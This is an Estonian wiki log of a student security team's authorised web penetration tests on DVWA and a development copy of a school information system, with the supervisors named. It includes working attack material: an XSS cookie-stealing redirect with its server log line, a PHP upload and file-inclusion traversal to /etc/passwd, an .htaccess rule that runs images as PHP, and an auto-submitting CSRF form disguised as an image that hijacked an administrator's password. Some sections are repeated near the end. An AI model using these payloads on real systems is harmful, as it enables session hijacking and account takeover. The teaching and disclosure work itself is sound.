http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/
http://www.acunetix.com/vulnerability-scanner/getting-started.htm

Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:
Acunetix Web Vulnerability Scanner v. 8
http://www.acunetix.com/vulnerability-scanner/

Pärast programmi installimist tuli seadistada skännimine, valisime keskmie põhjalikkusega skänni.
Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.
Antud programm võimaldab skännida:
Cross-Site Scripting (XSS)
SQL Injection (blind test)
File inclusion
Code Execution
LDAP Injection
Cross Frame Scripting
SQL Injection (error msg. test)
CRLF Injection
Directory Travelsal
XPath Injection
URL Redirection
Application Error Message

Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.

=== Urmo tegevus ===

Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.

Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application'i.

==== Brute Force (DVWA) ====
Käsitsi välja uuritud login andmed:
kasutajanimi: admin
parool: password

===== Fireforce plugin Firefoxis =====
Tekitatud sai ka password list faili pass.txt.

Kasutusel oli Firefox brauser, kuhu installisime plugin'a Fireforce.
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .

Panime kasutajanimeks "admin" ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud.
Selleks sai sõna "incorrect".
Määrata ära tuli ka, et mitu päringut sekundis tehakse.
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada.
Päringute tegemise kiirus vähem kui 1 päring/sekundis.

Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.
Kasutasime ka videos näidatud "@ DICTIONARY" teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.

Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.

===== Burpsuite v1.4 =====
Burpsuite v1.4 on Samurai WTF'il olemas juba sees ja saab kohe käima panna.
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI'st]]

Programm on juba loomult keerulisem.
Burpsuite'iga tuleb panna käima proxy server localhost'is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine.
Läbi proxy serveri tuleb BurpSuite'ile kohale vastava veebilehe Header sisselogimise kohta.
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.
Payload'i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.
Ründe stiiliks määrata Pitchfork.
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -> Start Attack, mis siis alustas rünnet.
Kahjuks ka see rünne ei toiminud teadmata põhjusel.
Proovitud sai ka lühemate nimekirjadega ja edutult.

Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt.
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.

Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.

==== CSRF - Cross-site request forgery ====
Katsetamine toimub koos Taaviga.

Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.

Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.

Lõime uue faili - crosssite.txt

DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.
Võtsime lehe Source Code lahti
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.
Current Password lahtri jätsime samaks.
Ülejäänud kahe uue passwordi fieldi type'iks määrasime "Hidden" ja value'deks "admin".
Salvestasime faili ja käivitasime selle.
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna ".

Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.

=== Taavi tegevus ===

Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.

=== Matise tegevus ===
==== Reflected Cross Site Scripting (XSS) ====
<ul>
<li>Lehel on selline Form:</li>
[[Image:Xsstesting.jpg|Location="left"|Caption|]]
<br>Form väljastab : Hello „sisestatud nimi“
<li>Easy puhul:</li>
<li>Saab sisestada textboxi skripti:</li>
<script>
alert(document.cookie.match(/PHPSESSID=[^;\]+/));
</script>
<li>Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.</li>
<li>Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: </li>
<script>
this.document.location.href = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);
</script>
<li>Saab kohe enda veebiserveri logidest näha Session ID’d.
<br>Näide logist:</li>
/var/log/apache2/access.log
127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] "GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1" 404 404 "-" <br> "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11"
<li>Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.</li>
</ul>

=== Sanderi tegevus ===
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]

SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).
==== Faili üleslaadimine: madal tase ====
<ul>
<li><b>DVWA Security</b> määrata: Low -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess</li>
Üleslaetavasse *.php faili saab kirjutada php koodi:
<?php var_dump($_REQUEST, $_SERVER); ?>
<li>Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:</li>
esimeses massiivis "PHPSESSID" ("2b1ae19446cfde009664f18df51b6ec1") ja turvatase "security" ("low");
teises "HTTP_COOKIE", milles on eelnevadki andmed; asukoht "PATH", "SERVER_SOFTWARE", "SERVER_NAME",
"SERVER_ADDR" ("127.42.84.1"), "SERVER_PORT" ("80"), "REMOTE_ADDR" ("127.42.84.1"), "REMOTE_PORT" ("53425") jpm.
</ul>

==== Faili üleslaadimine: keskmine tase ====
<ul>
<li><b>DVWA Security</b> määrata: Medium -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida ei saa näiteks järgnevates formaatides faile:</li>
.htaccess
.php .html .pdf
.gif .png .bmp
.svg .swf
.tif .tiff .exif
.raw .cgm
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
<li>Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:</li>
http://dvwa/hackable/uploads/*.jpg
<li>Skripti käivitamiseks tuleb kasutada "?page=" ja faili asukoht:</li>
http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg
Kuvatakse php skripti tulemus.
Kommentaar: "?page=" kasutamine võetud menüüvalikust: <b>File Inclusion</b>
<li>"?page=" abil saab vaadata kasutajate nimesid:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd
<li>Paroole vaadata ei saa, selleks õigused puuduvad:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow
</ul>

==== Faili üleslaadimine: kõrge tase ====
<ul>
<li><b>DVWA Security</b> määrata: High -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.</li>
<li>Skripti käivitamiseks ei piisa ka "?page=" kasutamisest. Igal juhul on vastus selline:</li>
ERROR: File not found!
<li>Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:</li>
http://www.motobit.com/util/base64-decoder-encoder.asp
<li>Moodustades loodud faili asukohast kood ja kasutades</li>
data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:
http://dvwa/hackable/uploads/*.jpg
</ul>

== 3. päev ==

=== Alo tegevus ===
Lihtsalt url modifitseerimisega leidsime mittekaitstud lingi:

Õppesoorituste all on võimalik laadida alla kõikide kasutajate õpingukaardid (lihtsalt tuleb otsida üles soovitud kasutaja student_id)
Arvete alt peaks ka võimalik sama viga ära kasutada, aga kuna ühtegi arvet hetkel süsteemis polnud ei olnud võimalik seda viga kinnitada.

=== Urmo tegevus ===
====Subgraph Vega ====
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.
Programm on Java põhine graafilise liidesega ja töötab Linux'i, OS X ja Windowsi peal.

[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.

Alustasime uut skänni (Start New Scan).
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.

Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised.

Me lisasime ainult küpsise (cookie) sisu:
<pre>
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221
</pre>
ning Finish.

[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).

Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000.

Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script'ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body nõrkust.

Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID'sid ja parameetreid ära oma pealkirjades.
Õnneks parameetritega väljad olid veebilehel korralikult ära escape'itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.

ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.

==== Wapiti ====
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti.
(Koduleht: http://wapiti.sourceforge.net/)

Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS'iga midagi teha.

==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====
=====1. katse - ÕISi keskkkonna keelevahetus =====
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]

Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.

Võtsime dev-ÕIS'i Source Code'ist välja vastava formi osa ja panime eraldi html faili.
Koristasime mittevajaliku disaini koodi juurest ära.
Muutsime form'i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks "en" ehk inglise keelne keskkond tekiks.
Panime koodi enose veebiserverisse üles nimega ois.html.

Faili sisu:
<source lang="html4strict">
<form id="settingsForm" method="post" action="https://itcollege.dev.ois.ee/setting/edit?user_id=2198"
enctype="application/x-www-form-urlencoded">
<input type="hidden" AUTOCOMPLETE="off" name="default_language"value="en">
<br>
<input type="submit" value="Salvesta seaded" name="Savesettings">
</form>
</source>
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.

Katsetas koodi enda konto peal Taavi.

=====2. katse - ÕIS'i kasutaja parooli muutmine =====

[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.

Selle jaoks uurisime välja, kus asub dev-ÕIS'i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.

Muutsime password ja password_check lahtrite väärtused järgnevaks: "test123" ehk kasutaja uus parool peale rünnakut.

Lahtrites muutsime user_id'd sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.

Kõik vormi lahtrite tüübid määrasime peidetud ehk "hidden", et poleks midagi näidata.

Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist.
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.

Lisasime CSS koodi Submit nupu ära peitmiseks.
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.

Salvestasime faili ära kui "screen1.jpg" fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.

Faili sisu:
<source lang="html4strict">
<html>
<head>
<style type="text/css">
#Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }
</style>
</head>
<body>
<body onload="document.forms.setPasswordForm.submit();">
<form name="setPasswordForm" id="setPasswordForm"
action="https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&continue=/auth/logout"
method="post">
<input type="hidden" name="user_id" value="2227" id="user_id" />
<input type="hidden" name="continue" value="%2Fet%2Fsetting%3Fuser_id%3D2227" id="continue" />
<input type="hidden" name="password" id="password" value="test123" />
<input type="hidden" name="password_check" id="password_check" value="test123" />
<input type="submit" name="Setpassword" id="Setpassword" value="Muuda salasõna" />
</form>
</body>
</html>
</source>

[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]

Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.
<pre>
AddType application/x-httpd-php .php .jpg
</pre>

Laadisime mõlemad failid Enose veebiserverisse avalikult.

Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki.
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle.
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail.
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja.
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud "test123"-ks ja me saime ligipääsu administraatori õigustes kontole.
Rünnak oli edukas.
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]

Andsime teada Valterile teada, et tegelikult tegime salajase ründe.
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha.
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug'iga.

Kuna tegu oli ÕIS'i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.

=== Taavi tegevus ===
===Burp suite===

Esimese asjane peale Burp suite käivitamist. Tabilt proxy ->intercept ->intercept off<br>
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)<br>
Proxy -> options alt lülitada sisse proxy listner pordile 8080 .<br>
Ohvri valimine <br>
Valida intruder -> target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.<br>
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.<br>
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.<br>site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.<br>
Targer->scope -> exclude frome scope ja veenduda at välja on arvatud logout laused.<br>
Spideringi sisselülitamine <br>
Valida tab Spide ning sealt panna linnuke kasti spider running.<br>
Ning oledki valmis saama laheküljelt infot.<br>
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.<br>
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.

==Nessuse algkäivitamine==
Valida backtrackist vulnerability scannerite alt nessus ning edasi nessus register .<br> Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.<br> Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)<br>
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)<br>
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.<br>
Järgnevalt valida nessus start.<br>
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.<br>
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.

=== Matise tegevus ===

=== Sanderi tegevus ===
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]
Backtarcki keskkonnas sai testitud programmi w3af.

==== Backtrack: w3af ====
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]
Võimalik kätte saada SSL Certificate.
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:
https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?
username=<font color="red">KASUTAJANIMI</font>&continue=&Login=Logi sisse&pw=<font color="red">PAROOL</font>
Programmi sisestatud andmetega ka mitte:
Configuration -> HTTP Config -> Basic HTTP Authentication:
basicAuthUser: <font color="red">KASUTAJANIMI</font>
basicAuthPass: <font color="red">PAROOL</font>
basicAuthDomain: http://itcollege.dev.ois.ee
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:
Configuration -> HTTP Config -> Cookies
cookieJarFile: /root/Desktop/<font color="red">ois_cookie.txt</font>
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:
# Netscape HTTP Cookie File
.dev.ois.ee TRUE / FALSE 1731510001 itcollege_OIS_SESSION_ID <font color="red">870aqllryuw3cmf6cv8ellha03</font>
Esimene rida on nõutav! Teiste tähendused:
domain - The domain that created and that can read the variable.
flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.
This value is set automatically by the browser, depending on the value you set for domain.
path - The path within the domain that the variable is valid for.
secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.
expiration - The UNIX time that the variable will expire on.
name - The name of the variable.
value - The value of the variable.
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:
Edit -> Preferences -> Privacy -> History -> remove individual cookies
Search: itcollege.dev.ois.ee
Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID

Skänneerimine:
<ul>
<li>The page language is: en</li>
<li>The URL: "https://itcollege.dev.ois.ee/" has a "<form>" element with auto-complete enabled.</li>
<li>A comment with the string "<p>tunne end kui koolis</p>" was found in: "https://itcollege.dev.ois.ee/".</li>
<li>Found a form login. The action of the form is: "https://itcollege.dev.ois.ee/auth/login".</li>
The username field to be used is: "username".
The password field to be used is: "pw".
<li><font color="red">Found authentication credentials to: "https://itcollege.dev.ois.ee/auth/login". A correct user and password combination is: Administrador/6666666</font></li>
Antud kasutaja ja parooliga sisse ei saanud.
<li>The URL: "https://itcollege.dev.ois.ee/" returned a response that may contain a "SHA1" hash. The hash is: "c7b39896de5f296b5a44c2dfcd9f0600b2cf424d". This is uncommon and requires human verification.</li>
Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.
<li>The URL: "https://itcollege.dev.ois.ee/" sent these cookies:</li>
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/
<li>The SMTP settings in emailReport plugin seem to be incorrect. Original error: "[Errno 111] Connection refused".</li>
Kui tuleb see veateade, siis skänn katkeb.
<li><font color="red">The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):</font></li>
The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
<li><font color="red">SQL injection in a Unknown database was found at: "https://itcollege.dev.ois.ee/auth/login", using HTTP method POST.</font></li>
The sent post-data was: "username=John8212&security_key_sis_global=d'z"0&Login=Logi%20sisse&continue=56&pw=FrAmE30.".
The modified parameter was "security_key_sis_global". This vulnerability was found in the request with id 390.
<li>Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt</li>
User-agent: *
Disallow: /
Allow: /curriculum
Allow: /subject
Allow: /diploma
Allow: /schedule/ical
</ul>

== 4. päev - Presentatsiooni tegemine ja esitlemine ==

Koostasime presentatsiooni ja esitlemine.

[[Media:Security_team_presentation.ppt]]

== Tegijad ==
Alo Konno A21

Urmo Lihten A21

Taavi Podžuks A22

Matis Alliksoo A22

Sander Saarm A22

== Juhendajad ==
Mart Mangus

Margus Ernits

Valter Kungla

Security team

2012-03-30T09:29:49Z

Ulihten: /* 1. päev - Materjalidga tutvumine */

== 1. päev - Materjalidega tutvumine ==

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

A1: Injection - Urmo
A2: Cross-Site Scripting (XSS) - Alo
A3: Broken Authentication and Session Management - Sander
A4: Insecure Direct Object References - Alo
A5: Cross-Site Request Forgery (CSRF) - Taavi
A6: Security Misconfiguration - Matis
A7: Insecure Cryptographic Storage - Matis
A8: Failure to Restrict URL Access - Urmo
A9: Insufficient Transport Layer Protection - Taavi
A10: Unvalidated Redirects and Forwards - Sander

Sanderi konspekt: [[Media:Ois_materjal.pdf]] <br>
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]]

== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==
===Security Team tegevusplaan===
1. Päev
1.1 Tutvuda OWASP’iga.
1.2 Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.
1.3 Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.
2. Päev
2.1 Esitada tiimi tegevusplaan.
2.2 Tutvuda turvariskidega natuke põhjalikumalt.
2.3 Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.
2.4 Täiendada esimese päeva ettekannet.
3. Päev
3.1 Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.
3.2 Saadud tulemuste dokumenteerimine.
4. Päev
4.1 Saadud tulemuste esitlemine ettekandega
5. Päev
5.1 Tulemuste parandamine wiki’s.

=== Alo tegevus ===

http://www.acunetix.com/support/vulnerability-checks.htm
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting
http://www.youtube.com/watch?v=SG1cvGQ971g
http://www.isecom.org/research.html
http://evuln.com/tools/
http://sectools.org/tag/web-scanners/
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/
http://www.acunetix.com/vulnerability-scanner/getting-started.htm

Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:
Acunetix Web Vulnerability Scanner v. 8
http://www.acunetix.com/vulnerability-scanner/

Pärast programmi installimist tuli seadistada skännimine, valisime keskmie põhjalikkusega skänni.
Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.
Antud programm võimaldab skännida:
Cross-Site Scripting (XSS)
SQL Injection (blind test)
File inclusion
Code Execution
LDAP Injection
Cross Frame Scripting
SQL Injection (error msg. test)
CRLF Injection
Directory Travelsal
XPath Injection
URL Redirection
Application Error Message

Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.

=== Urmo tegevus ===

Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.

Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application'i.

==== Brute Force (DVWA) ====
Käsitsi välja uuritud login andmed:
kasutajanimi: admin
parool: password

===== Fireforce plugin Firefoxis =====
Tekitatud sai ka password list faili pass.txt.

Kasutusel oli Firefox brauser, kuhu installisime plugin'a Fireforce.
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .

Panime kasutajanimeks "admin" ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud.
Selleks sai sõna "incorrect".
Määrata ära tuli ka, et mitu päringut sekundis tehakse.
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada.
Päringute tegemise kiirus vähem kui 1 päring/sekundis.

Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.
Kasutasime ka videos näidatud "@ DICTIONARY" teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.

Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.

===== Burpsuite v1.4 =====
Burpsuite v1.4 on Samurai WTF'il olemas juba sees ja saab kohe käima panna.
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI'st]]

Programm on juba loomult keerulisem.
Burpsuite'iga tuleb panna käima proxy server localhost'is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine.
Läbi proxy serveri tuleb BurpSuite'ile kohale vastava veebilehe Header sisselogimise kohta.
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.
